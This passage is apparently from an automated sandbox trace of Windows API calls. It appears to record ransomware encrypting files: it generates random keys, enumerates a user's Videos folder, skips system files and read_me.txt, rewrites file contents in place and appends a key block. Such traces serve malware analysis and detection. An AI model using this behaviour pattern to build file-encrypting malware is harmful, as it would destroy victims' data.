lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.905] GetProcessHeap () returned 0x4f10000 [0082.905] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.905] GetProcessHeap () returned 0x4f10000 [0082.905] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0082.905] GetProcessHeap () returned 0x4f10000 [0082.905] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0082.905] GetProcessHeap () returned 0x4f10000 [0082.905] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.905] GetProcessHeap () returned 0x4f10000 [0082.905] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.905] GetProcessHeap () returned 0x4f10000 [0082.905] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0082.905] GetProcessHeap () returned 0x4f10000 [0082.905] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0082.905] GetProcessHeap () returned 0x4f10000 [0082.905] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.905] GetProcessHeap () returned 0x4f10000 [0082.905] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.905] GetProcessHeap () returned 0x4f10000 [0082.905] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0082.905] GetProcessHeap () returned 0x4f10000 [0082.905] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0082.905] GetProcessHeap () returned 0x4f10000 [0082.905] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.905] GetProcessHeap () returned 0x4f10000 [0082.905] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.905] GetProcessHeap () returned 0x4f10000 [0082.905] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0082.905] GetProcessHeap () returned 0x4f10000 [0082.906] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0082.906] GetProcessHeap () returned 0x4f10000 [0082.906] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.906] GetProcessHeap () returned 0x4f10000 [0082.906] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0082.906] GetProcessHeap () returned 0x4f10000 [0082.906] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0082.906] GetProcessHeap () returned 0x4f10000 [0082.906] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0082.906] GetProcessHeap () returned 0x4f10000 [0082.906] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0082.906] SetFilePointerEx (in: hFile=0x8e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.906] WriteFile (in: hFile=0x8e8, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x758fd44*=0x100, lpOverlapped=0x0) returned 1 [0082.906] WriteFile (in: hFile=0x8e8, lpBuffer=0x758fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x758fd48*, lpNumberOfBytesWritten=0x758fd44*=0x4, lpOverlapped=0x0) returned 1 [0082.906] GetProcessHeap () returned 0x4f10000 [0082.906] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b600d0 | out: hHeap=0x4f10000) returned 1 [0082.906] GetProcessHeap () returned 0x4f10000 [0082.906] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0082.906] GetProcessHeap () returned 0x4f10000 [0082.906] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0082.906] CloseHandle (hObject=0x8e8) returned 1 [0082.908] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 91 [0082.908] SetFilePointerEx (in: hFile=0x8ec, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.908] ReadFile (in: hFile=0x8ec, lpBuffer=0x758fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x758fd4c*, lpNumberOfBytesRead=0x758fd08*=0x0, lpOverlapped=0x0) returned 1 [0082.908] SetFilePointerEx (in: hFile=0x8ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.908] GetProcessHeap () returned 0x4f10000 [0082.908] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0082.908] GetProcessHeap () returned 0x4f10000 [0082.908] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0082.908] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0082.908] GetProcessHeap () returned 0x4f10000 [0082.908] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b600d0 [0082.908] ReadFile (in: hFile=0x8ec, lpBuffer=0x8b600d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesRead=0x758fd08*=0x1000, lpOverlapped=0x0) returned 1 [0082.956] SetFilePointerEx (in: hFile=0x8ec, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0082.956] WriteFile (in: hFile=0x8ec, lpBuffer=0x8b600d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesWritten=0x758fd44*=0x1000, lpOverlapped=0x0) returned 1 [0082.956] GetProcessHeap () returned 0x4f10000 [0082.956] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0082.956] GetProcessHeap () returned 0x4f10000 [0082.956] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0082.956] GetProcessHeap () returned 0x4f10000 [0082.956] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0082.956] GetProcessHeap () returned 0x4f10000 [0082.956] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0082.956] GetProcessHeap () returned 0x4f10000 [0082.956] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0082.956] GetProcessHeap () returned 0x4f10000 [0082.956] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0082.956] GetProcessHeap () returned 0x4f10000 [0082.956] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.956] GetProcessHeap () returned 0x4f10000 [0082.956] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.956] GetProcessHeap () returned 0x4f10000 [0082.956] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.956] GetProcessHeap () returned 0x4f10000 [0082.956] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.956] GetProcessHeap () returned 0x4f10000 [0082.956] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.956] GetProcessHeap () returned 0x4f10000 [0082.956] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.956] GetProcessHeap () returned 0x4f10000 [0082.957] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.957] GetProcessHeap () returned 0x4f10000 [0082.957] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.957] GetProcessHeap () returned 0x4f10000 [0082.957] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.957] GetProcessHeap () returned 0x4f10000 [0082.957] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.957] GetProcessHeap () returned 0x4f10000 [0082.957] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.957] GetProcessHeap () returned 0x4f10000 [0082.957] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.957] GetProcessHeap () returned 0x4f10000 [0082.957] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.957] GetProcessHeap () returned 0x4f10000 [0082.957] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.957] GetProcessHeap () returned 0x4f10000 [0082.957] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.957] GetProcessHeap () returned 0x4f10000 [0082.957] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.957] GetProcessHeap () returned 0x4f10000 [0082.957] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.957] GetProcessHeap () returned 0x4f10000 [0082.957] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.957] GetProcessHeap () returned 0x4f10000 [0082.957] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.957] GetProcessHeap () returned 0x4f10000 [0082.957] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.957] GetProcessHeap () returned 0x4f10000 [0082.957] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.957] GetProcessHeap () returned 0x4f10000 [0082.957] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.957] GetProcessHeap () returned 0x4f10000 [0082.957] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.957] GetProcessHeap () returned 0x4f10000 [0082.957] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.957] GetProcessHeap () returned 0x4f10000 [0082.957] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.957] GetProcessHeap () returned 0x4f10000 [0082.957] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.957] GetProcessHeap () returned 0x4f10000 [0082.958] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.958] GetProcessHeap () returned 0x4f10000 [0082.958] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.958] GetProcessHeap () returned 0x4f10000 [0082.958] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.958] GetProcessHeap () returned 0x4f10000 [0082.958] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.958] GetProcessHeap () returned 0x4f10000 [0082.958] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.958] GetProcessHeap () returned 0x4f10000 [0082.958] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.958] GetProcessHeap () returned 0x4f10000 [0082.958] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0082.958] GetProcessHeap () returned 0x4f10000 [0082.958] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.958] GetProcessHeap () returned 0x4f10000 [0082.958] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0082.958] GetProcessHeap () returned 0x4f10000 [0082.958] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0082.958] GetProcessHeap () returned 0x4f10000 [0082.958] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0082.958] GetProcessHeap () returned 0x4f10000 [0082.958] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0082.958] GetProcessHeap () returned 0x4f10000 [0082.958] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0082.958] GetProcessHeap () returned 0x4f10000 [0082.958] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0082.958] GetProcessHeap () returned 0x4f10000 [0082.958] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.958] GetProcessHeap () returned 0x4f10000 [0082.958] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0082.958] GetProcessHeap () returned 0x4f10000 [0082.958] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0082.958] GetProcessHeap () returned 0x4f10000 [0082.958] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.958] GetProcessHeap () returned 0x4f10000 [0082.958] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.959] GetProcessHeap () returned 0x4f10000 [0082.959] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0082.959] GetProcessHeap () returned 0x4f10000 [0082.959] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0082.959] GetProcessHeap () returned 0x4f10000 [0082.959] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.959] GetProcessHeap () returned 0x4f10000 [0082.959] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.959] GetProcessHeap () returned 0x4f10000 [0082.959] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0082.959] GetProcessHeap () returned 0x4f10000 [0082.959] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0082.959] GetProcessHeap () returned 0x4f10000 [0082.959] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.959] GetProcessHeap () returned 0x4f10000 [0082.959] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.959] GetProcessHeap () returned 0x4f10000 [0082.959] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0082.959] GetProcessHeap () returned 0x4f10000 [0082.959] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0082.959] GetProcessHeap () returned 0x4f10000 [0082.959] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.959] GetProcessHeap () returned 0x4f10000 [0082.959] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.959] GetProcessHeap () returned 0x4f10000 [0082.959] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0082.959] GetProcessHeap () returned 0x4f10000 [0082.959] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0082.959] GetProcessHeap () returned 0x4f10000 [0082.960] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.960] GetProcessHeap () returned 0x4f10000 [0082.960] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.960] GetProcessHeap () returned 0x4f10000 [0082.960] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0082.960] GetProcessHeap () returned 0x4f10000 [0082.960] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0082.960] GetProcessHeap () returned 0x4f10000 [0082.960] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.960] GetProcessHeap () returned 0x4f10000 [0082.960] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.960] GetProcessHeap () returned 0x4f10000 [0082.960] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0082.960] GetProcessHeap () returned 0x4f10000 [0082.960] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0082.960] GetProcessHeap () returned 0x4f10000 [0082.960] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.960] GetProcessHeap () returned 0x4f10000 [0082.960] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0082.960] GetProcessHeap () returned 0x4f10000 [0082.960] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0082.960] GetProcessHeap () returned 0x4f10000 [0082.960] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0082.960] GetProcessHeap () returned 0x4f10000 [0082.960] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0082.960] SetFilePointerEx (in: hFile=0x8ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.960] WriteFile (in: hFile=0x8ec, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x758fd44*=0x100, lpOverlapped=0x0) returned 1 [0082.960] WriteFile (in: hFile=0x8ec, lpBuffer=0x758fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x758fd48*, lpNumberOfBytesWritten=0x758fd44*=0x4, lpOverlapped=0x0) returned 1 [0082.961] GetProcessHeap () returned 0x4f10000 [0082.961] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b600d0 | out: hHeap=0x4f10000) returned 1 [0082.961] GetProcessHeap () returned 0x4f10000 [0082.961] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0082.961] GetProcessHeap () returned 0x4f10000 [0082.961] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0082.961] CloseHandle (hObject=0x8ec) returned 1 [0082.965] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 92 [0082.965] GetProcessHeap () returned 0x4f10000 [0082.965] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8af0080 [0082.965] wnsprintfW (in: pszDest=0x8af0080, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wD9B\\*") returned 47 [0082.965] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wD9B\\*", lpFindFileData=0x758fb60 | out: lpFindFileData=0x758fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xde4e3390, ftCreationTime.dwHighDateTime=0x1d4d284, ftLastAccessTime.dwLowDateTime=0x24e15820, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24e15820, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName=".", cAlternateFileName="")) returned 0x7cfe768 [0082.965] wnsprintfW (in: pszDest=0x8af0080, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wD9B\\.") returned 47 [0082.965] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x758fb60 | out: lpFindFileData=0x758fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xde4e3390, ftCreationTime.dwHighDateTime=0x1d4d284, ftLastAccessTime.dwLowDateTime=0x24e15820, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24e15820, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="..", cAlternateFileName="")) returned 1 [0082.965] wnsprintfW (in: pszDest=0x8af0080, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wD9B\\..") returned 48 [0082.965] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x758fb60 | out: lpFindFileData=0x758fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80182910, ftCreationTime.dwHighDateTime=0x1d4c5b0, ftLastAccessTime.dwLowDateTime=0x84c6acd0, ftLastAccessTime.dwHighDateTime=0x1d4c63b, ftLastWriteTime.dwLowDateTime=0x84c6acd0, ftLastWriteTime.dwHighDateTime=0x1d4c63b, nFileSizeHigh=0x0, nFileSizeLow=0x930c, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="d7tz8cUHthJmDnjI1oaE.swf", cAlternateFileName="D7TZ8C~1.SWF")) returned 1 [0082.965] wnsprintfW (in: pszDest=0x8af0080, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wD9B\\d7tz8cUHthJmDnjI1oaE.swf") returned 70 [0082.965] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wD9B\\d7tz8cUHthJmDnjI1oaE.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\wd9b\\d7tz8cuhthjmdnji1oae.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8e8 [0082.972] StrStrW (lpFirst="d7tz8cuhthjmdnji1oae.swf", lpSrch="read_me.txt") returned 0x0 [0082.972] StrStrW (lpFirst="d7tz8cuhthjmdnji1oae.swf", lpSrch="autoexec.bat") returned 0x0 [0082.972] StrStrW (lpFirst="d7tz8cuhthjmdnji1oae.swf", lpSrch="desktop.ini") returned 0x0 [0082.973] StrStrW (lpFirst="d7tz8cuhthjmdnji1oae.swf", lpSrch="autorun.inf") returned 0x0 [0082.973] StrStrW (lpFirst="d7tz8cuhthjmdnji1oae.swf", lpSrch="ntuser.dat") returned 0x0 [0082.973] StrStrW (lpFirst="d7tz8cuhthjmdnji1oae.swf", lpSrch="iconcache.db") returned 0x0 [0082.973] StrStrW (lpFirst="d7tz8cuhthjmdnji1oae.swf", lpSrch="bootsect.bak") returned 0x0 [0082.973] StrStrW (lpFirst="d7tz8cuhthjmdnji1oae.swf", lpSrch="boot.ini") returned 0x0 [0082.973] StrStrW (lpFirst="d7tz8cuhthjmdnji1oae.swf", lpSrch="ntuser.dat.log") returned 0x0 [0082.973] StrStrW (lpFirst="d7tz8cuhthjmdnji1oae.swf", lpSrch="thumbs.db") returned 0x0 [0082.973] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 201 [0082.973] QueueUserWorkItem (Function=0x404e00, Context=0x8e8, Flags=0x0) returned 1 [0082.973] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x758fb60 | out: lpFindFileData=0x758fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3066b260, ftCreationTime.dwHighDateTime=0x1d4cdad, ftLastAccessTime.dwLowDateTime=0x1a1db3c0, ftLastAccessTime.dwHighDateTime=0x1d4c540, ftLastWriteTime.dwLowDateTime=0x1a1db3c0, ftLastWriteTime.dwHighDateTime=0x1d4c540, nFileSizeHigh=0x0, nFileSizeLow=0x4cd4, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="dE6a.avi", cAlternateFileName="")) returned 1 [0082.973] wnsprintfW (in: pszDest=0x8af0080, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wD9B\\dE6a.avi") returned 54 [0082.973] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wD9B\\dE6a.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\wd9b\\de6a.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8e4 [0082.973] StrStrW (lpFirst="de6a.avi", lpSrch="read_me.txt") returned 0x0 [0082.973] StrStrW (lpFirst="de6a.avi", lpSrch="autoexec.bat") returned 0x0 [0082.973] StrStrW (lpFirst="de6a.avi", lpSrch="desktop.ini") returned 0x0 [0082.973] StrStrW (lpFirst="de6a.avi", lpSrch="autorun.inf") returned 0x0 [0082.973] StrStrW (lpFirst="de6a.avi", lpSrch="ntuser.dat") returned 0x0 [0082.974] StrStrW (lpFirst="de6a.avi", lpSrch="iconcache.db") returned 0x0 [0082.974] StrStrW (lpFirst="de6a.avi", lpSrch="bootsect.bak") returned 0x0 [0082.974] StrStrW (lpFirst="de6a.avi", lpSrch="boot.ini") returned 0x0 [0082.974] StrStrW (lpFirst="de6a.avi", lpSrch="ntuser.dat.log") returned 0x0 [0082.974] StrStrW (lpFirst="de6a.avi", lpSrch="thumbs.db") returned 0x0 [0082.974] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 202 [0082.974] QueueUserWorkItem (Function=0x404e00, Context=0x8e4, Flags=0x0) returned 1 [0082.974] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x758fb60 | out: 